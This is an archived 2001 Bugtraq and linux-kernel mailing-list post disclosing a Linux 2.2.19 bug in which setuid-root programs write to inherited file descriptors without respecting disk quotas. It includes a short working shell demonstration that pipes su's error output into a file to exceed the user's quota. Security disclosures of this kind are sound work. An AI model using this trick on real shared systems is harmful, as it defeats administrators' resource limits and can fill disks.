7342545 2001-10-22 10:43 +0200 /53 rader/ =?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= <wp@supermedia.pl> Sänt av: joel@lysator.liu.se Importerad: 2001-10-22 17:02 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern mottagare: linux-kernel@vger.kernel.org Mottagare: Bugtraq (import) <19533> Ärende: Overriding qouta limits in Linux kernel ------------------------------------------------------------ From: =?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= <wp@supermedia.pl> To: <bugtraq@securityfocus.com>, <linux-kernel@vger.kernel.org> Message-ID: <Pine.LNX.4.33.0110220947590.29104-100000@lama.supermedia.pl> Almost any suid binary may be used to create large files overriding quota limits. When setuid-root binary inherits file descriptors from user process it may write to it without respecting the quota restrictions. This is because suid process has CAP_SYS_RESOURCE effective capability enabled during writing to the file. Quota does not know anything about who opened file descriptor and checks current process privileges only. This is bug in kernel and not in those setuid-root binaries. Tested on Linux kernel 2.2.19. Example: cliph$quota -u wp Disk quotas for user wp (uid 500): Filesystem blocks quota limit files quota limit /dev/hda6 4 10 10 1 10 10 cliph$perl -e 'print "a"x16384' >>myfile /vol1: write failed, user disk limit reached. cliph$ls -l myfile -rw-rw-r-- 1 wp wp 4096 Oct 22 10:33 myfile cliph$su $(perl -e 'print "a"x16384') 2>>myfile cliph$ # ^^^ this is it: su writes error message to fd 2 without limits cliph$ls -l myfile -rw-rw-r-- 1 wp wp 20505 Oct 22 10:34 myfile cliph$quota -u wp Disk quotas for user wp (uid 500): Filesystem blocks quota limit files quota limit /dev/hda6 28* 10 10 2 10 10 (I removed `grace' fields from quota output) PS: Please include my address in CC as I may be not subscribed to the list(s). _________________________________________________________________ Wojciech Purczyñski | Security Officer | http://cliph.linux.pl/ ----------------------------------------------------------------- Murphy's law says that there is always one more bug... ...but he forgot to mention whether it is exploitable. (7342545) /=?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= <wp@supermedia.pl>/(Ombruten)